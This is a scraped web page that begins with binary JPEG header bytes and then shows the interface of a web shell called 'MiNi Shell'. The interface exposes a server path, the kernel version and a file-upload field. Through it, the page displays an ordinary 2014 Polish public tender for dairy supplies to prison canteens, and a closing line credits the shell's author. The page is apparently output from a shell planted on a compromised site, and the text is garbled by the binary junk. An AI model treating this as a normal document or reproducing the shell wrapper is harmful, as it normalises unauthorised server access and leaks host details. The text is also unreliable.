JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140530/183244-N-2014.html

<p class="kh_header"><b>Czarne: ZP/67/CZB-B/2014  Dostawa produktów mleczarskich do kantyn, stołówek i sklepu Zamawiającego</b><br>
<b>Numer ogłoszenia: 183244 - 2014; data zamieszczenia: 30.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorska Instytucja Gospodarki Budżetowej "POMERANIA" , ul. Pomorska 1, 77-330 Czarne, woj. pomorskie, tel. 59 833 36 79, faks 59 833 24 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/67/CZB-B/2014  Dostawa produktów mleczarskich do kantyn, stołówek i sklepu Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 dla części I
L.p.	Asortyment	J.m.	Ilość do	 
1.	deser monte 6x55g	szt.	100	lub równoważ-ny
2.	deser z koroną zott 175g	szt.	600	lub równoważ-ny
3.	jogurt naturalny 150g	szt.	10000	lub równoważ-ny
4.	jogurt naturalny 350g 0% tłuszczu	szt.	100	lub równoważ-ny
5.	jogurt owocowy  bacoma premium 140g	szt.	1500	lub równoważ-ny
6.	jogurt owocowy  bacoma polskie smaki z musem owocowym 120g	szt.	500	lub równoważ-ny
7.	jogurt owocowy 350g 0% tłuszczu	szt.	2000	lub równoważ-ny
8.	jogurt owocowy zott  jogobella 150g	szt.	3500	lub równoważ-ny
9.	jogurt owocowy zott jogobella light - różne smaki 150g	szt.	1000	lub równoważ-ny
10.	jogurt typu greckiego 0% Piątnica 150g	szt.	500	lub równoważ-ny
11.	jogurt zott jogobella 500g - rózne smaki	szt.	500	lub równoważ-ny
12.	jogurt danone activia 195g	szt.	200	lub równoważ-ny
13.	jogurt fantazja 100-122g	szt.	300	lub równoważ-ny
14.	jogurt serduszko 125g	szt.	1300	lub równoważ-ny
15.	bacoma twist-jogurt do picia 250g	szt.	1000	lub równoważ-ny
16.	jogurt pitny milko 400ml	szt.	1000	lub równoważ-ny
17.	deser ryżowy belriso 180g	szt.	300	lub równoważ-ny
18.	maślanka owocowa milko 500ml	szt.	3500	lub równoważ-ny
19.	maślanka owocowa mrągowska 0,5l - rózne smaki	szt.	2000	lub równoważ-ny
20.	bacoma twist-jogurt do picia 400g	szt.	2000	lub równoważ-ny
21.	jogurt danone gratka 115g	szt.	1000	lub równoważ-ny
22.	 jogurt owocowy polskie smaki 350g	szt.	600	lub równoważ-ny
23.	kefir 180g	szt.	5000	lub równoważ-ny
24.	mleczko smakowe 200g	szt.	500	lub równoważ-ny
25.	delma extra margaryna z masłem 500g	szt.	1600	lub równoważ-ny
26.	margaryna kasia 250g	szt.	100	lub równoważ-ny
27.	masło roślinne kubek 250g	szt.	5000	lub równoważ-ny
28.	masło roślinne kubek 500g	szt.	2000	lub równoważ-ny
29.	margaryna Rama Clasic 450g	szt.	250	lub równoważ-ny
30.	actimel 4x100g	szt.	50	lub równoważ-ny
31.	serek capri	kg.	70	lub równoważ-ny
32.	masło extra 200g	szt	500	lub równoważ-ny
33.	masło stołowe śmietankowe 200g min. 73% tłuszczu	szt	2000	lub równoważ-ny
34.	mleko karton 1l 3,2% białe	l	11000	lub równoważ-ny
35.	mleko karton 1l 1,5% białe	l	800	lub równoważ-ny
36.	mleko karton 1l 2% UHT	l	5000	lub równoważ-ny
37.	mleko butelka 1l 2% Mleko polskie Mle-kovita	l	700	lub równoważ-ny
38.	mleko butelka 1l 3,2% 	l	900	lub równoważ-ny
39.	mleko w proszku granulowane 250g	szt.	13000	lub równoważ-ny
40.	mleko w proszku pełne 500g	szt.	2000	lub równoważ-ny
41.	ser fevita 270g	szt.	200	lub równoważ-ny
42.	ser żółty plastry 100g 	szt.	9000	lub równoważ-ny
43.	drożdże 100g	szt.	250	lub równoważ-ny
44.	serek topiony 100g kiełbaski	szt.	30000	lub równoważ-ny
45.	serek topiony 100g kostka 	szt.	10000	lub równoważ-ny
46.	serek topiony krążek 140g	szt.	3000	lub równoważ-ny
47.	hochland ser topiony w plastrach 150g	szt.	1300	lub równoważ-ny
48.	hochland almette serek twrogowy 150g	szt.	200	lub równoważ-ny
49.	hochland serek topiony krążek 200g mix	szt	500	lub równoważ-ny
50.	ser wędzony 	kg	10	lub równoważ-ny
51.	ser  mozzarella 250g	szt.	20	lub równoważ-ny
52.	ser żółty salami 	kg	200	lub równoważ-ny
53.	serek homogenizowany 135g Darek 	szt.	7000	lub równoważ-ny
54.	serek danonki 4x50g	szt.	100	lub równoważ-ny
55.	serek homogenizowany Danio 160g	szt. 	7000	lub równoważ-ny
56.	serek wiejski 200g Piątnica	szt.	15000	lub równoważ-ny
57.	serek wiejski lekki 150g Piątnica	szt.	300	lub równoważ-ny
58.	śmietana 18% 200ml	szt.	4000	lub równoważ-ny
59.	śmietana 18% 400ml	szt.	3300	lub równoważ-ny
60.	śmiatana 30% 250ml	szt.	20	lub równoważ-ny
61.	śmiatana 30% 500ml	szt.	30	lub równoważ-ny
62.	śmietanka łaciata 18% do zup i sosów 250ml	szt.	300	lub równoważ-ny
63.	śmietanka łaciata 18% do zup i sosów 500ml	szt.	200	lub równoważ-ny
64.	śmietanka łaciata 12% do kawy	szt.	300	lub równoważ-ny
65.	śmietanka łaciata 30% do ciast i deserów 250ml	szt.	300	lub równoważ-ny
66.	śmietanka łaciata 30% do ciast i deserów 500ml	szt.	200	lub równoważ-ny
67.	mleko zagęszczone niesłodzone 200g	szt.	30	lub równoważ-ny
68.	mleko zagęszczone słodzone puszka 530g	szt.	50	lub równoważ-ny
69.	śmietanka do kawy 10x10	szt.	100	lub równoważ-ny
70.	twaróg 250g	szt.	20000	lub równoważ-ny
71.	twarożek Twój Smak 135g mix Piątnica	szt.	100	lub równoważ-ny
72.	twarożek z przyprawami 125g Mlekovitka	szt.	5000	lub równoważ-ny
73.	margaryna (kostka)do smarowania pieczywa 200g lub 250g	kg.	3875	lub równoważ-ny


Miejsce dostawy dla części I : 
1.	Kantyna w Zakładzie Karnym w Czerwonym Borze,  Czerwony Bór 2, 18 -400 Łomża;
2.	Kantyna w Zakładzie Karnym w Przytułach Starych, Przytuły 13A, gm. Rzekuń, 07-411 Rzekuń;
3.	Kantyna w Zakładzie Karnym w Grądach Woniecko, ul.  Grą-dy-Woniecko 34, 18-312 Rutki-Kossaki;
4.	Kuchnia w Zakładzie Karnym w Borze,  Czerwony Bór 2, 18 -400 Łomża
5.	Kuchnia Kasyna w Czerwonym Borze, Czerwony Bór 23, 18-400 Łomża 
6.	Sklep w Czerwonym Borze , Czerwony Bór 23, 18-400 Łomża. 
2.2 dla części II
L.p.	Asortyment	J.m.	Ilość do
1.	Jogurt naturalny 150g Mlekovita lub równoważny	szt.	300
2.	Jogurt naturalny 350g 0% tłuszczu	szt.	600
3.	jogurt owocowy bakoma 140g lub równoważny	szt.	600
4.	Jogurt owocowy 400g 0% tłuszczu	szt.	600
5.	Jogurt owocowy Mlekovita 150g lub równoważny	szt.	600
6.	Jogurt owocowy jogobella 150g lub równoważny	szt.	1200
7.	Jogurt danone activia 195g lub równoważny	szt.	300
8.	Jogurt owocowy Augustowski 175g z musli lub równo-ważny	szt.	1500
9.	Jogurt owocowy Augustowski 400g lub równoważny	szt.	1000
10.	Jogurt fantazja 100-122g lub równoważny	szt.	300
11.	Jogurt serduszko 125g lub równoważny	szt	1000
12.	Jogurt serduszko 315g lub równoważny	szt.	1000
13.	Jogur augustowski 175g lub równoważny	szt	500
14.	Jogurt pitny milko 400ml lub równoważny	szt	1000
15.	Jogurt pitny polski 400 ml lub równoważny	szt.	1000
16.	Deser ryżowy berliso 180g lub równoważny	szt.	200
17.	Maślanka owocowa milko 500ml lub równoważny	szt.	1000
18.	Maślanka owocowa Mrągowska 500 ml lub równoważny	szt.	1000
19.	Jogurt polski do picia 400g lub równoważny	szt.	1000
20.	Bacoma twist-jogurt do picia 400g lub równoważny	szt.	500
21.	Jogurt danone gratka 125g lub równoważny	szt.	1000
22.	Kefir 180g Sokółka lub równoważny	szt.	1000
23.	Kefir 150g	szt.	500
24.	Kefir 400g	szt.	500
25.	Mleczko smakowe 200g	szt.	200
26.	Delma exstra margaryna z masłem 500g lub równoważny	szt.	1000
27.	Daria margaryna z masłem 400g	szt.	1000
28.	Masło roślinne kubek 250g lub równoważny	szt.	1000
29.	Masło roślinne kubek 500g lub równoważny	szt.	500
30.	Margaryna rama clasic 500g lub równoważny	szt.	500
31.	Masmix 400g lub równoważny	szt.	500
32.	Masło extra 200g lub równoważny	szt.	500
33.	Mleko wypasione 0,5l 2%	szt.	3000
34.	Mleko karton 1l 3,2% białe lub równoważny	szt.	1000
35.	Mleko karton 1l 1,5% białe lub równoważny	szt.	1000
36.	Mleko karton 1l 2% UHT	szt.	1000
37.	Mleko w proszku granulowane 250g	szt.	3000
38.	Mleko w proszku pełne 500g	szt.	4500
39.	Ser feta 270g	szt.	100
40.	Ser żółty 100g	szt.	500
41.	Ser żółty w kawałku 250g	szt.	1500
42.	Serek topiony kiełbaski 100g	szt.	500
43.	Serek topiony kostka 100g	szt.	500
44.	Serek topiony krażek 140g	szt.	300
45.	Lactima ser topiony w plastrach 130g lub równoważny	szt.	400
46.	Hochland ser topiony w plastrach 150g lub równoważny	szt.	300
47.	Hochland almette serek twarogowy 150g lub równoważny	szt.	300
48.	Hochland serek topiony krążek 200g mix lub równoważny	szt.	300
49.	Ser wędzony	kg.	50
50.	Ser żółty salami 	kg.	50
51.	Serek homogenizowany 135g Darek lub równoważny	szt.	500
52.	Serek homogenizowany Danio 160g lub równoważny	szt.	1000
53.	Serek wiejski 200g	szt.	3000
54.	śmietana 18% 400ml 	szt.	500
55.	Śmietana 18% 200ml	szt.	500
56.	śmietana wypasiona 18% 250 ml	szt.	500
57.	Twaróg 250g	szt.	1000
58.	Twaróg 200g Mlekovita chudy,półtłusty lub równoważny	szt.	300
59.	Twaróg 200g Mlekovita tłusty lub równoważny	szt.	150
60.	Twarożek Twój smak 135g mix Piątnica lub równoważny	szt.	200
61.	Twarożek z przyprawami 125g Mlekovitka lub równo-ważny	szt	400
62.	Actimel 	szt	200
Miejsce dostawy dla części II : 
1. Kantyna i stołówka w Areszcie Śledczym w Białymstoku, ul. Kopernika 21, 15-377 Białystok
1.	Kantyna i stołówka w Zakładzie Karnym w Białymstoku, ul. Hetmańska 89, 15-377 Białystok
2.	Kantyna w Areszcie Śledczym w Hajnówce, Warszawska 67, 17-200  Hajnówka

3.	Dostawa będzie realizowana w ilościach i  w terminie uzgodnionym z pracownikiem Zamawiającego. Termin dostawy nie może przekraczać dwóch dni od chwili złożenia zamówienia. 
4.	Dostawa będące przedmiotem zamówienia będą realizowane przez Wykonawcę własnym transportem na jego  koszt, z zapewnieniem wyładunku i możliwości sprawdzenia ilości i jakości  dostawy.
5.	Warunki jakie musi spełnić przedmiot dostawy i warunki dostawy: 
1)	przedmiot dostawy musi spełniać wymogi określone przez Zamawiającego dla każdego rodzaju asortymentu i spełniać wymogi określone przepisami odrębnymi a w szczególności; 
a)	ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produk-tów,
b)	ustawy z  dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i ży-wienia,
c)	ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzę-cego,
d)	rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych,
e)	rozporządzenie Ministra Zdrowia z dnia 6 czerwca 2007 r. w sprawie dostaw bezpośrednich środków spożywczych,
f)	ustawy z dnia 7 maja 2009 r. o towarach paczkowanych.
2)	dostarczony asortyment nie może nosić żadnych oznak uszkodzeń fizycznych i biochemicznych, 
3)	dostarczany towar musi być wolny od wad fizycznych i prawnych, 
4)	dostarczany towar musi być pełnowartościowy, z ważną datą do spożycia
5)	godziny i wielkość poszczególnych dostaw będzie ustalana telefo-nicznie z Wykonawcą przez pracowników Zamawiającego  z dwu-dniowym wyprzedzeniem,
6)	Wykonawca dostarczy przedmiot zamówienia w opakowaniach zbiorczych zapewniających odpowiednie zabezpieczenie dostarczanego asortymentu.
7)	W trakcie transportu Wykonawca zapewni nieprzerwany łańcuch chłodniczy,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pigbzamowieniapubliczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23 18-400 Łomża, tel. (086) 215-35-95 - sekretariat...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 10:00, miejsce: Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23 18-400 Łomża, tel. (086) 215-35-95 - pok. 6...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com